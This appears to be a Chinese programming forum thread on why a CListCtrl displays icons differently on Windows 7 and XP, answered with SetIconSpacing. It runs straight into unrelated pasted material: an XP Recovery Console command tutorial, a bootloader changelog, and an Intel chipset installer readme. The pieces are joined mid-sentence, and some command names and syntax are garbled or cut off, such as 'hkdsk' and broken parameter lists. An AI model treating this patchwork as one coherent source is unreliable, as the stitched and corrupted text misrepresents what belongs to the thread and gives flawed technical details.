Win7 和 Winxp下ListControl显示问题

KING_314 2013-10-23 04:53:21


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6 条回复
KING_314 2013-10-30
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由于系统显示图标大小的问题所导致 使用CListCtrl::SetIconSpacing设置
 CSize SetIconSpacing(
   int cx,
   int cy 
CSize SetIconSpacing(
   CSize size 
winXP 可以通过 桌面右键-》属性-》外观-》效果-》使用大图标来查看图标显示的变化
KING_314 2013-10-25
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好的 我尝试下
引用 4 楼 schlafenhamster 的回复:
是不是要用到 SetWorkArea ?
schlafenhamster 2013-10-24
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是不是要用到 SetWorkArea ?
KING_314 2013-10-24
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引用 2 楼 liuzi_40 的回复:
泥鳅不是鱼 2013-10-23
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oyljerry 2013-10-23
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网管教程 从入门到精通软件篇 ★一。★详细的xp修复控制台命令和用法!!! 放入xp(2000)的光盘,安装时候选R,修复! Windows XP(包括 Windows 2000)的控制台命令是在系统出现一些意外情况下的一种非常有效的诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总结,这次辛苦老范给我们整理了这份实用的秘笈。   Bootcfg   bootcfg 命令启动配置和故障恢复(对于大多数计算机,即 boot.ini 文件)。   含有下列参数的 bootcfg 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 bootcfg 命令。   用法:   bootcfg /default  设置默认引导项。   bootcfg /add    向引导列表中添加 Windows 安装。   bootcfg /rebuild  重复全部 Windows 安装过程并允许用户选择要添加的内容。   注意:使用 bootcfg /rebuild 之前,应先通过 bootcfg /copy 命令备份 boot.ini 文件。   bootcfg /scan    扫描用于 Windows 安装的所有磁盘并显示结果。   注意:这些结果被静态存储,并用于本次会话。如果在本次会话期间磁盘配置发生变化,为获得更新的扫描,必须先重新启动计算机,然后再次扫描磁盘。   bootcfg /list   列出引导列表中已有的条目。   bootcfg /disableredirect 在启动引导程序中禁用重定向。   bootcfg /redirect [ PortBaudRrate] |[ useBiosSettings]   在启动引导程序中通过指定配置启用重定向。   范例: bootcfg /redirect com1 115200 bootcfg /redirect useBiosSettings   hkdsk   创建并显示磁盘的状态报告。Chkdsk 命令还可列出并纠正磁盘上的错误。   含有下列参数的 chkdsk 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 chkdsk 命令。   vol [drive:] [ chkdsk [drive:] [/p] [/r]   参数  无   如果不带任何参数,chkdsk 将显示当前驱动器中的磁盘状态。 drive: 指定要 chkdsk 检查的驱动器。 /p   即使驱动器不在 chkdsk 的检查范围内,也执行彻底检查。该参数不对驱动器做任何更改。 /r   找到坏扇区并恢复可读取的信息。隐含着 /p 参数。   注意 Chkdsk 命令需要 Autochk.exe 文件。如果不能在启动目录(默认为 %systemroot%System32)中找到该文件,将试着在 Windows 安装 CD 中找到它。如果有多引导系统的计算机,必须保证是在包含 Windows 的驱动器上使用该命令。 Diskpart   创建和删除硬盘驱动器上的分区。diskpart 命令仅在使用故障恢复控制台时才可用。   diskpart [ /add |/delete] [device_name |drive_name |partition_name] [size]   参数 无   如果不带任何参数,diskpart 命令将启动 diskpart 的 Windows 字符模式版本。   /add   创建新的分区。   /delete   删除现有分区。   device_name   要创建或删除分区的设备。设备名称可从 map 命令的输出获得。例如,设备名称:   DeviceHardDisk0   drive_name   以驱动器号表示的待删除分区。仅与 /delete 同时使用。以下是驱动器名称的范例:   D:   partition_name   以分区名称表示的待删除分区。可代替 drive_name 使用。仅与 /delete 同时使用。以下是分区名称的范例:   DeviceHardDisk0Partition1    大小   要创建的分区大小,以兆字节 (MB)表示。仅与 /add 同时使用。   范例   下例将删除分区: diskpart /delete Device HardDisk0 Partition3 diskpart /delete F:   下例将在硬盘上添加一个 20 MB 的分区:   diskpart /add Device HardDisk0 20   Fixboot
更新说明: 2017-02-04(yaya) Ls command: Empty Folder returns false. 2016-12-08(yaya) 修正lz4、vhd不显示解压缩进度指示。增加lzma解压缩进度指示。 2016-11-09(不点) 0x8205 bit 5 = 1: 使checkkey闲置循环停止指令。 2016-04-13(yaya) 支持动画菜单 setmenu --graphic-entry=类型=菜单行数=菜单列数=图形宽(像素)=图形高(像素)=菜单行间距(像素) 菜单项0的路径文件名 类型: 位0:高亮指定颜色 位1:高亮颜色翻转 位2:高亮显示线框 位7:背景透明(最好使用黑色背景) 文件名: *n.??? 格式 n=00-99 高亮颜色由 color HIGHLIGHT=0xrrggbb 指定。 字符可以使用任意字型、字高、颜色,可以辅以图标。 2016-03-25(yaya) 菜单字符可以使用不同字型。 例如:"七" 使用不同字型,将 .hex 文件中的 unicode 码 “4e03” 修改为 “0080”, 将菜单中的 "七" 修改为 “\X0080”。 2016-03-23(yaya) 增强 echo 函数功能。 例如:echo -e \x18 显示 UTF-8 字符 0x18。 echo -e \X2191 显示 unicode 字符 0x2191。 2016-03-15(yaya) 1.增加动画控制热键 F2:播放/停止。 2.增加动画控制位 0x835b,位0:0/1=停止/播放。 3.增加精简字库模式:--simp=起始0,终止0,...,起始3,终止3 中文可以使用 --simp= ,内置字库应当包含 DotSize=[font_h],['simp'] 例如:font --font-high=24 --simp= /24_24.hex DotSize=24,simp 不使用热键: 可以加载 32*32 unifont 全字库 使用热键: 可以加载 24*24 unifont 全字库 使用精简字库: 可以加载 46*46 汉字全字库 使用精简字库及热键:可以加载 40*40 汉字全字库 4.不再支持 bin 格式字库。 2016-03-03(yaya) 1.增加图像背景色设置方法。 splashimage --fill-color=[0xrrggbb] 作用之一,作为小图像的背景。 作用之二,直接作为菜单的背景(即不加载图像背景)。此时只设置字体的前景色即可。 2.增加动画菜单。 splashimage --animated=[type]=[delay]=[last_num]=[x]=[y] START_FILE 类型[type]:bit 0-3: 播放次数 bit 4: 永远重复 bit 7: 透明背景 type=00:禁止播放 播放n次:序列图像各显示n次,时间独占。可作为启动前导、序幕。 永远重复:序列图像无限循环,时间与菜单共享。可作为菜单里的动画。 背景透明:即抠像。要求4角像素为背景色。 背景色最好为白色或黑色,这样可以去除一些灰色杂波。若是彩色背景,则应当非常干净。 提醒:请以16进制方式输入。否则易错。 延迟[delay]:序列图像之间的延迟。单位是滴答,即1/18.2秒。 序列数[last_num]:序列图像总数(2位数,从1开始计数)。 偏移[x]、[y]:图像偏移,单位像素。 起始图像文件 START_FILE 命名规则:*n.??? n: 1-9 或 01-99 或 001-999。 3.增加固定图像的背景色可以透明。 splashimage [--offset=[type]=[x]=[y]] FILE 类型[type]:bit 7: 透明背景 2016-02-14(yaya) setmenu 函数增加菜单项目背景短/满参数(默认短) 2016-01-19(yaya) splashimage 函数增加图像起始偏移(默认0) 2015-08-20(yaya) 1.支持非
************************************************************ * Product: Intel(R) Chipset Software Installation Utility * Release: Production * Version: * Target Chipset(s)#: 955X/XM/975X/945G/P/PL/GM/PM/GMS/940GML/E7230/E8501 * Date: October 13 2005 ************************************************************ NOTE: For the list of supported chipsets, please refer to the Release Notes ************************************************************ * CONTENTS OF THIS DOCUMENT ************************************************************ This document contains the following sections: 1. Overview 2. System Requirements 3. Contents of the Distribution Package 4. List of Available Command Line Flag Options 5. Contents of the Extracted Files 6. Installing the Software in Interactive Mode 7. Installing the Software in Silent Mode 8. Installing the INF Files Prior to OS Installation 8A. Installing the Windows* 2000 INF Files Prior to OS Installation 8B. Installing the Windows* XP INF Files Prior to OS Installation 8C. Installing the Windows Server* 2003 INF Files Prior to OS Installation 9. Installing the INF Files After OS Installation 9A. Installing the Windows* 2000 INF Files After OS Installation 9B. Installing the Windows* XP INF Files After OS Installation 9C. Installing the Windows Server* 2003 INF Files After OS Installation 10. Verifying Installation of the Software and Identifying the Software Version Number 11. Troubleshooting ************************************************************ * 1. OVERVIEW ************************************************************ The Intel(R) Chipset Software Installation Utility installs Windows* INF files to the target system. These files outline to the operating system how to configure the Intel(R) chipset components in order to ensure that the following features function properly: - Core PCI and ISAPNP Services - PCIe Support - IDE/ATA33/ATA66/ATA100 Storage Support - SATA Storage Support - USB Support - Identification of Intel(R) Chipset Components in the Device Manager This software can be installed in three modes: Interactive, Silent and Unattended Preload. Interactive Mode requires user input during installation; Silent Mode and Unattended Preload do not. This software also offers a set of command line flags, which provide additional installation choices. The command line flags are not case sensitive. Refer to Section 4 for detailed descriptions of these flags. Important Note: The Intel(R) Chipset Software Installation Utility is distributed in two formats: self extracting .EXE files (INFINST_AUTOL.EXE) or compressed .ZIP files (INFINST_AUTOL.ZIP). Depending on which distribution format is being executed, the command-line syntax may differ. Refer to Section 4 for more details. ************************************************************ * 2. SYSTEM REQUIREMENTS ************************************************************ 1. Please refer to the Release Notes to view the list of chipsets that the software included with this distribution package is designed to operate with. 2. One of the following operating systems must be fully installed and running on the system before installing this software: Microsoft Windows* Server 2003 with Service Pack 1 Microsoft Windows Server 2003 x64 Edition* Microsoft Windows XP Professional x64 Edition Microsoft Windows XP with Service Pack 2 Microsoft Windows 2000 with Service Pack 4 NOTE: This software is designed for the latest service pack releases of above operating systems. To verify which operating system has been installed onto the target system, follow the steps below: a. Click on Start. b. Select Settings. c. Select Control Panel. d. Double-click on the System icon. e. Click on the General system properties tab. f. Verify which OS has been installed by reading the System information. 3. It is recommended that the software be installed on systems with at least 64MB of system memory when using Windows* 2000, Windows* XP and Windows Server* 2003. 4. It is recommended that there be a minimum of 5MB of hard disk space on the system in order to install this software. 5. The operating system must be fully installed and running on the system before running this software. 6. Close any running applications to avoid installation problems. 7. It is recommended that the Intel(R) Chipset Software Installation Utility be installed onto the target system prior to the installation of other drivers. Please check with the system provider to determine which operating system and Intel(R) chipset are used in the system. ************************************************************ * 3. CONTENTS OF THE DISTRIBUTION PACKAGE ************************************************************ The Intel(R) Chipset Software Installation Utility package contains the following items: File(s) ------- INFINST_AUTOL.EXE -or- INFINST_AUTOL.ZIP README.TXT, RELEASE_xxx.HTM *** NOTE: Only the files that reference the currently detected devices are copied to the system. If the -A option is exercised, the files are not copied to the <Windows>\INF directory. Refer to Section 4 for more information. ************************************************************ * 4. LIST OF AVAILABLE COMMAND LINE FLAG OPTIONS ************************************************************ The Intel(R) Chipset Software Installation Utility supports several command line flags for various installation options. Due to the different distribution formats available for the Intel(R) Chipset Software Installation Utility, the command line flag syntax may vary: 1. Self-Extracting .EXE Distribution: When installing this software using the .EXE distribution, an extra '-A' must be appended to the INFINST_AUTOL.EXE program call (i.e. INFINST_AUTOL.EXE -A) in order to successfully pass command line flags. NOTE: The extra '-A' flag for the self-extracting .EXE package is different from the '-A' command line flag option described under Compressed .ZIP Distribution. Example: To extract INF files using the '-A' flag described below, the installation program should be invoked as follows: INFINST_AUTOL.EXE -A -A (optional -P) 2. Compressed .ZIP Distribution: When installing this software using the .ZIP distribution, use the command line flags exactly as described below. Example: To extract INF files using the '-A' flag described below, the installation program should be invoked as follows: SETUP.EXE -A (optional -P) Below is a list of all the available command line flags that may be used with the program call. Note that the '-L' and the '-S' flags MUST be specified at the end of the command line flag list. Flag Description ---- ----------- -? Displays the list of available command line flags. This flag works in Interactive Mode only. -A Extracts all the INF files and Readme to either "C:\Program Files\Intel\InfInst" or the directory specified using the '-P' flag. The software will NOT install these INF files to the system. This flag can be combined only with the '-P' flag. All other options will be ignored if the '-A' flag is specified. This flag works in Interactive Mode only. -Aonly Extracts only the INF files necessary for the current system. If the install has been run once successfully, '-Aonly' will not return any INFs. When used in conjunction with '-overall' switch, all the needed INFs for the system will be extracted. -B Automatically reboots the system after installation. This flag is ignored if '-A' flag is specified. This flag works in either Silent Mode or Interactive Mode. -f2 Specifies an alternate location and name of the log file created by InstallShield Silent. This option is used for silent installation from a CD. 'Path' indicates the directory path where installation status is logged in file 'Logfile' -L Forces the installer user interface to display the specified language during setup. Note that there should be NO space between '-L' and the 4-digit language code (see below). This flag must be placed at the end of the command line flag list. This flag works in Interactive Mode only. -NOLIC Does not display the license agreement dialog box during installation. This parameter works in Interactive Mode only. -NOREAD Does not display the Readme display during installation. This flag works in Interactive Mode only. -NOWEL Does not display the welcome screen during installation. This flag works in Interactive Mode only. -OVERALL Updates ALL INF drivers on all available devices even if third party drivers are currently installed. This flag works in Interactive Mode only. -OVERIDE Updates the storage drivers even if a third party storage driver is currently installed. This flag works in Interactive Mode only. -OVERSMB Updates the SMBus drivers even if third party SMBus drivers are currently installed. This flag works in Interactive Mode only. -P Specifies the hard disk location to which the INF program files are copied. If this flag is not specified at the command line, the directory is as follows: C:\Program Files\Intel\INFInst If this flag is used without the '-A' option, only the Readme will be copied to . The directory name can include spaces, but then a pair of double quotes (") must enclose the directory name. There should not be any space between the switch '-p' and the directory name. This flag works in either Silent Mode or Interactive Mode. -S Runs the Installer in Silent Mode (no user interface is displayed). This flag and the '-L' flag must be placed at the end of the command line flag list. -SKIP Suppresses the installation of one or more devices.This flag works in either Silent Mode or Interactive Mode. Below are the language codes used with the '-L' flag: Language -------- ---------- 0001 Arabic (International) 0804 Chinese (Simplified) 0404 Chinese (Traditional) 0005 Czech 0006 Danish 0013 Dutch 0009 English (United States) 000B Finnish 040C French (International) 0007 German 0008 Greek 000D Hebrew 000E Hungarian 0010 Italian 0011 Japanese 0012 Korean 0014 Norwegian 0015 Polish 0416 Portuguese (Brazil) 0816 Portuguese (Standard) 0019 Russian 000A Spanish (International) 001D Swedish 001E Thai 001F Turkish ************************************************************ * 5. CONTENTS OF THE EXTRACTED FILES ************************************************************ INF files are copied to the hard disk after running the Intel(R) Chipset Software Installation Utility executable with an '-A' flag (i.e., "INFINST_AUTOL.EXE -A -A" or "SETUP.EXE -A"). The location of the INF files depends on whether a '-P' flag is specified along with the '-A' flag: 1. If a '-P' flag is not specified, then the INF files are copied to the following directory: "C:\Program Files\Intel\INFINST" 2. If a '-P' flag is specified, then the INF files are copied to the location listed immediately after the '-P' flag. Refer to Section 4 for more information on flag usage. After INF file extraction, the INF files and components are copied to the . These files and components are categorized according to the operating system. The following table summarizes the locations of the INF files by operating system: The directories are classified according to the operating system that they are designed for: Win2000\ Contains INF files designed for Windows* 2000 ONLY. XP\ Contains INF files designed for Windows* XP ONLY. Win2003\ Contains INF files designed for Windows Server* 2003 ONLY. NOTE: The sub directories (e.g. SP) contains special INFs. NOTE: INFAnswr.TXT makes a CUSTOM.INF template that installs the INF files for Intel(R) chipsets during operating system setup. OEMs can incorporate this file into the Setup directory for the OEM Preload Kit. (Refer to Section 8 for more details.) ************************************************************ * 6. INSTALLING THE SOFTWARE IN INTERACTIVE MODE ************************************************************ 1. Verify that all system requirements have been met as described in Section 2 above. 2. Run the installation program: Self-extracting .EXE distribution: INFINST_AUTOL.EXE Compressed .ZIP distribution: SETUP.EXE 3. You will be prompted to agree to the license agreement. If you do not agree, the installation program will exit before extracting any files. 4. Once the operating system reboots, follow the on-screen instructions and accept default settings to complete the setup. ************************************************************ * 7. INSTALLING THE SOFTWARE IN SILENT MODE ************************************************************ 1. Verify that all system requirements have been met as described in section 2. 2. Run the installation program: For silent install with auto-reboot: Self-extracting .EXE distribution: INFINST_AUTOL.EXE -a -b -s Compressed .ZIP distribution: SETUP.EXE -b -s - or - For silent install without auto-reboot: Self-extracting .EXE distribution: INFINST_AUTOL.EXE -a -s Compressed .ZIP distribution: SETUP.EXE -s 3. The utility will perform the necessary updates and record the installation status in the following system registry key: HKEY_LOCAL_MACHINE\Software\Intel\INFInst 4. If the utility was invoked with the "-b" flag, the system will automatically reboot if the update was successful. NOTE: The system MUST be rebooted for all device updates to take effect. 5. To determine whether the install was successful, verify the "install" value in the registry key specified in Step 3. 6. In Silent Mode the utility will not display the license agreement. When using Silent Mode the license agreement, license.txt, will be placed in the following folder: Program Files/Intel/INFInst folder. Please read this agreement. The following describes the various parameters: Name: "install" Type: String Data: "success" The installation was successful. Data: "fail" The installation was not successful. No INF files were copied to the system. Name: "reboot" Type: String Data: "Yes" A reboot is required to complete the installation. Data: "No" No reboot is required to complete the installation. Name: "version" Type: String Data: Current version number of the Intel(R) Chipset Software Installation Utility ************************************************************ * 8. INSTALLING THE INF FILES PRIOR TO OS INSTALLATION ************************************************************ This procedure requires a minimum of 5MB of hard disk space. It is important to make sure there is enough disk space before beginning the copy process. Copy the operating system installation files from the setup directory to a directory on the hard disk. This can be done by opening 'My Computer', right-clicking on the correct drive, and selecting 'Properties'. The directories shall be referred to as follows: Windows* 2000 : <WIN2000 Setup Directory> Windows* XP : Windows Server* 2003 : <WIN2003 Setup Directory> ************************************************************ * 8A. INSTALLING THE WINDOWS* 2000 INF FILES PRIOR TO * OS INSTALLATION ************************************************************ NOTE: The Windows* 2000 OEM Preload Kit distribution CD contains a setup directory with all the base operating system setup files and installation programs (WINNT.EXE and WINNT32.EXE). The name of the directory may vary depending on the distribution CD (e.g., \I386\). 1. Create the following directory structure under the <WIN2000 Setup Directory>: \$OEM$\$$\INF 2. Copy the Windows* 2000 INF files from \Win2000 to the directory created in Step 1 above: <WIN2000 Setup Directory>\$OEM$\$$\INF 3. Create the following directory structure under the <WIN2000 Setup Directory>: \$OEM$\$1\drivers\IntelINF 4. Copy the Windows* 2000 INF files and the catalog files (.CAT) from \Win2000 to the directory created in Step 3 above: <WIN2000 Setup Directory>\$OEM$\$1\drivers\IntelINF 5. Either modify the default Windows* 2000 installation answer file, UNATTEND.TXT, located in <WIN2000 Setup Directory>, or create a customized answer file. The answer file must include the following information: [Unattended] OemPreinstall = Yes OemPnPDriversPath="drivers\IntelINF" A sample answer file for preloading the Intel(R) Chipset Software Installation utility files is available at: \Win2000\INFAnswr.TXT For more information about Windows* 2000 answer files and unattended installations, please refer to the Microsoft* Windows* 2000 Guide to Unattended Setup. If you are a computer manufacturer, refer to the Microsoft Windows* 2000 OEM Preinstallation Kit (OPK) User Guide for more information about the \$OEM$ folder. Otherwise, refer to the Microsoft Windows* 2000 Deployment Guide. 6. Run "WINNT.EXE /u: /s:<WIN2000 Setup Directory>" to install Windows* 2000. ************************************************************ * 8B. INSTALLING THE WINDOWS* XP INF FILES PRIOR TO * OS INSTALLATION ************************************************************ NOTE: The Windows* XP OEM Preload Kit distribution CD contains a setup directory with all the base operating system setup files and installation programs (WINNT.EXE and WINNT32.EXE). The name of the directory may vary depending on the distribution CD (e.g., \I386\). 1. Create the following directory structure under the <WINXP Setup Directory>: \$OEM$\$$\INF 2. Copy the Windows* XP INF files from \XP to the directory created in Step 1 above: <WINXP Setup Directory>\$OEM$\$$\INF 3. Create the following directory structure under the <WINXP Setup Directory>: \$OEM$\$1\drivers\IntelINF 4. Copy the Windows* XP INF files AND the catalog files (.CAT) from \XP to the directory created in Step 3 above: <WINXP Setup Directory>\$OEM$\$1\drivers\IntelINF 5. Either modify the default Windows* XP installation answer file, UNATTEND.TXT, located in <WINXP Setup Directory>, or create a customized answer file. The answer file must include the following information: [Unattended] OemPreinstall = Yes OemPnPDriversPath="drivers\IntelINF" A sample answer file for preloading the Intel(R) Chipset Software Installation utility files is available: \XP\INFAnswr.TXT If you are a computer manufacturer, refer to the Microsoft* Windows* XP Guide to Unattended Setup for more information about Windows* XP answer files and unattended installations. For more information about the \$OEM$ folder, refer to the Microsoft Windows* XP OEM Preinstallation Kit (OPK) User Guide. If you are not a manufacturer, refer to the Microsoft Windows* XP Deployment Guide. 6. Run "WINNT.EXE /u: /s:<WINXP Setup Directory>" to install Windows* XP. ************************************************************ * 8C. INSTALLING THE WINDOWS SERVER* 2003 INF FILES PRIOR * TO OS INSTALLATION ************************************************************ NOTE: The Windows Server* 2003 OEM Preload Kit distribution CD contains a setup directory with all the base operating system setup files and installation programs (WINNT.EXE and WINNT32.EXE). The name of the directory may vary depending on the distribution CD (e.g., \I386\). 1. Create the following directory structure under the <WIN2003 Setup Directory>: \$OEM$\$$\INF 2. Copy the Windows Server* 2003 INF files from \Win2003 to the directory created in Step 1 above: <WIN2003 Setup Directory>\$OEM$\$$\INF 3. Create the following directory structure under the <WIN2003 Setup Directory>: \$OEM$\$1\drivers\IntelINF 4. Copy the Windows Server* 2003 INF files and the catalog files (.CAT) from \Win2003 to the directory created in Step 3 above: <WIN2003 Setup Directory>\$OEM$\$1\drivers\IntelINF 5. Either modify the default Windows Server* 2003 installation answer file, UNATTEND.TXT, located in <WIN2000 Setup Directory>, or create a customized answer file. The answer file must include the following information: [Unattended] OemPreinstall = Yes OemPnPDriversPath="drivers\IntelINF" A sample answer file for preloading the Intel(R) Chipset Software Installation utility files is available: \Win2003\INFAnswr.TXT For more information about Windows Server* 2003 answer files and unattended installations, please refer to the Microsoft Windows Server* 2003 Guide to Unattended Setup. If you are a computer manufacturer, refer to the Microsoft Windows Server* 2003 OEM Preinstallation Kit (OPK) User Guide for more information about the \$OEM$ folder. Otherwise, refer to the Microsoft Windows Server* 2003 Deployment Guide. 6. Run "WINNT.EXE /u: /s:<WIN2003 Setup Directory>" to install Windows* 2000. ************************************************************ * 9. INSTALLING THE INF FILES AFTER OS INSTALLATION ************************************************************ ************************************************************ * 9A. INSTALLING THE WINDOWS* 2000 INF FILES AFTER OS * INSTALLATION ************************************************************ Some Intel(R) chipset platforms already are supported by Windows* 2000, so it may not be necessary to use the INF files provided by this software to update Windows* 2000. The following steps describe the installation process of the Windows* 2000 INF files. You may need to repeat these steps to update all Intel(R) chipset devices not supported by Windows* 2000. 1. Copy the contents of the \Win2000 directory to the root directory of the floppy disk (A:\). 2. Close all programs currently running on the system. 3. Click on Start. 4. Select Settings. 5. Select Control Panel. 6. Double-click on the System icon. 7. Click on the Hardware tab. 8. Click on the Device Manager button. 9. Select "Devices by connection" under the View menu. 10. Click on MPS Uniprocessor PC -OR- MPS Multiprocessor PC. NOTE: Only one of the above items will be displayed for a given system. 11. Click on PCI bus. 12. Right-click on the line containing the description PCI standard host CPU bridge -or- PCI standard ISA bridge -or- PCI standard PCI-to-PCI bridge -or- PCI System Management Bus -or- Standard Dual PCI IDE Controller -or- Standard Universal PCI to USB Host Controller (This line will be selected.) 13. Select Properties from the pull-down menu. 14. Click on the Driver tab. 15. Click on the Update Driver button. 16. Windows* 2000 will launch the Upgrade Device Driver Wizard. Select Next. 17. Ensure that the following choice is selected: Search for a suitable driver for my device (recommended) 18. Insert the floppy containing the Windows* 2000 INF files into the floppy drive. 19. Select Next. 20. Windows* 2000 will list locations from where the updated driver file can be found. Ensure that the following choice is selected: Floppy disk drives 21. Select Next. 22. Windows* 2000 should report that a driver has been found: (The detected device name will be displayed.) Select Next. 23. Select Finish. 24. Reboot the system when prompted to do so. ************************************************************ * 9B. INSTALLING THE WINDOWS* XP INF FILES AFTER OS * INSTALLATION ************************************************************ Some Intel(R) chipset platforms already are supported by Windows* XP so it may not be necessary to use the INF files provided by this software to update Windows* XP. The following steps describe the installation process of the Windows* XP INF files. You may need to repeat these steps to update all Intel(R) chipset devices not supported by Windows* XP. 1. Copy the contents of the \XP directory to the root directory of the floppy disk (A:\). 2. Close all programs currently running on the system. 3. Click on Start. 4. Select Settings. 5. Select the Control Panel. 6. Double-click on the System icon. 7. Click on the Hardware tab. 8. Click on the Device Manager button. 9. Select "Devices by connection" under the View menu. 10. Click on MPS Uniprocessor PC -OR- MPS Multiprocessor PC. NOTE: Only one of the above items will be displayed for a given system. 11. Click on PCI bus. 12. Right-click on the line containing the description PCI standard host CPU bridge -or- PCI standard ISA bridge -or- PCI standard PCI-to-PCI bridge -or- PCI System Management Bus -or- Standard Dual PCI IDE Controller -or- Standard Universal PCI to USB Host Controller (This line will be selected.) 13. Select Properties from the pull-down menu. 14. Click on the Driver tab. 15. Click on the Update Driver button. 16. Windows* XP will launch the Upgrade Device Driver Wizard. Select Next. 17. Ensure that the following choice is selected: Search for a suitable driver for my device (recommended) 18. Insert the floppy containing the Windows* XP INF files into the floppy drive. 19. Select Next. 20. Windows* XP will list locations from where the updated driver file can be found. Ensure that the following choice is selected: Floppy disk drives 21. Select Next. 22. Windows* XP should report that a driver has been found: (The detected device name will be displayed.) Select Next. 23. Select Finish. 24. Reboot the system when prompted to do so. ************************************************************ * 9C. INSTALLING THE WINDOWS SERVER* 2003 INF FILES AFTER * OS INSTALLATION ************************************************************ Some Intel(R) chipset platforms already are supported by Windows Server* 2003 so it may not be necessary to use the INF files provided by this software to update Windows Server* 2003. The following steps describe the installation process of the Windows* XP INF files. You may need to repeat these steps to update all Intel(R) chipset devices not supported by Windows Server* 2003. 1. Copy the contents of the \Win2003 directory to the root directory of the floppy disk (A:\). 2. Close all programs currently running on the system. 3. Click on Start. 4. Select Settings. 5. Select the Control Panel. 6. Double-click on the System icon. 7. Click on the Hardware tab. 8. Click on the Device Manager button. 9. Select "Devices by connection" under the View menu. 10. Click on MPS Uniprocessor PC -OR- MPS Multiprocessor PC. NOTE: Only one of the above items will be displayed for a given system. 11. Click on PCI bus. 12. Right-click on the line containing the description PCI standard host CPU bridge -or- PCI standard ISA bridge -or- PCI standard PCI-to-PCI bridge -or- PCI System Management Bus -or- Standard Dual PCI IDE Controller -or- Standard Universal PCI to USB Host Controller (This line will be selected.) 13. Select Properties from the pull-down menu. 14. Click on the Driver tab. 15. Click on the Update Driver button. 16. Windows Server* 2003 will launch the Upgrade Device Driver Wizard. Select Next. 17. Ensure that the following choice is selected: Search for a suitable driver for my device (recommended) 18. Insert the floppy containing the Windows Server* 2003 INF files into the floppy drive. 19. Select Next. 20. Windows Server* 2003 will list locations from where the updated driver file can be found. Ensure that the following choice is selected: Floppy disk drives 21. Select Next. 22. Windows Server* 2003 should report that a driver has been found: (The detected device name will be displayed.) Select Next. 23. Select Finish. 24. Reboot the system when prompted to do so. ************************************************************ * 10. IDENTIFYING THE SOFTWARE VERSION NUMBER ************************************************************ The version numbers displayed by Device Manager for a given device may not be the same as the Intel(R) Chipset Software Installation Utility version. The correct version number is shown at the top of this file. ************************************************************ * 11. TROUBLESHOOTING ************************************************************ It is assumed that the system requirements in Section 2 above have been satisfied. Issue: At the end of executing the Chipset Software Installation Utility, the USB keyboard and mouse will stop functioning. This problem only occurs when using Windows XP with SP1 or Windows 2000 Server with SP4 on a system configured with a USB keyboard and/or mouse. This condition is temporary until a system reset. Solution1: A recommended fix has been provided by Microsoft in Knowledge Base article(822603). For additional information, please refer to the KB article located at;[LN];822603 Please use the following installation procedures: - Windows XP installed with SP1 - QFE (822603) installed - Latest Chipset Utility Software installed. Solution2: The command line flag "-Skip " can be used with the Intel(R) Chipset Software Installation Utility program to cause the USB2 driver not to be installed. The DevID's for ICH4/ICH5 are 24CD/24DD. This will cause the USB2 controller to have a yellow exclamation point in Device Manager (Usually located under Other Devices and identified as "Universal Serial Bus (USB) Controller"). To install the USB2 driver right-click this entry, select update driver, and allow the system to install automatically. When completed, nothing more should be required. Issue: System locks up during Device Manager Remove or during restart. Solution: System lockup can occur during reboot as a result of several possible system issues. In the event of system lockup, reboot the machine and view Device Manager. If devices are listed properly and the system experiences no further problems, then the .INF file restore process was successful. If devices are not configured correctly, try re-running the procedures outlined in Section 3. If this does not fix the issue or further issues are experienced, reinstall the operating system. Issue: After running the setup program and rebooting the machine, Windows reports that it cannot find one of the following files: ESDI_506.pdr Solution: Click Browse in the dialog box where this issue occurs, locate the <Windows>\System\IOSubsys directory. Click OK. The system should be able to locate this file in this directory and continue re-enumerating for the new devices. Issue: After running the setup program and rebooting the machine, Windows reports that it cannot find one of the following files: UHCD.SYS USBD.SYS USBHUB.SYS Solution: Click Browse in the dialog box where this issue occurs and locate the following directory: <Winnt>\System32\drivers Click OK. The system should be able to locate the files in this directory and continue re-enumerating for the new devices. Issue: After running the setup program and rebooting the machine, Windows reports that it cannot find the following file: ISAPNP.VXD Solution: Click Browse in the dialog box where this issue occurs and locate the <Winnt>\System directory. Click OK. The system should be able to locate this file in this directory and continue re-enumerating for the new devices. Issue: After performing the silent install, the HKLM\Software\Intel\InfInst key was not created or the data of the value "install" is not "success". Solution: This is caused by one of the following scenarios: - The current system does not contain a supported operating system, or -or- - The current system does not contain a supported chipset. Verify that the System Requirements are met as outlined in Section 2. ************************************************************ * DISCLAIMER ************************************************************ Intel is making no claims of usability, efficacy or warranty. The Intel(R) SOFTWARE LICENSE AGREEMENT (OEM / IHV / ISV Distribution & Single User) completely defines the licensed use of this software. ************************************************************ Information in this document is provided in connection with Intel(R) products. No license, express or implied, by estoppel or otherwise, to any intellectual property rights is granted by this document. Intel assumes no liability whatsoever, and Intel disclaims any express or implied warranty relating to sale and/or use of Intel(R) products, including liability or warranties relating to fitness for a particular purpose, merchantability or infringement of any patent, copyright or other intellectual property right. Intel(R) products are not intended for use in medical, life saving, or life-sustaining applications. ************************************************************ Intel Corporation disclaims all warranties and liabilities for the use of this document and the information contained herein, and assumes no responsibility for any errors which may appear in this document, nor does Intel make a commitment to update the information contained herein. Intel reserves the right to make changes to this document at any time, without notice. ************************************************************ ************************************************************ * Intel is a trademark or registered trademark of Intel Corporation or its subsidiaries in the United States and other countries. * Other brands and names are the property of their respective owners. Copyright (c) Intel Corporation, 1997-2005
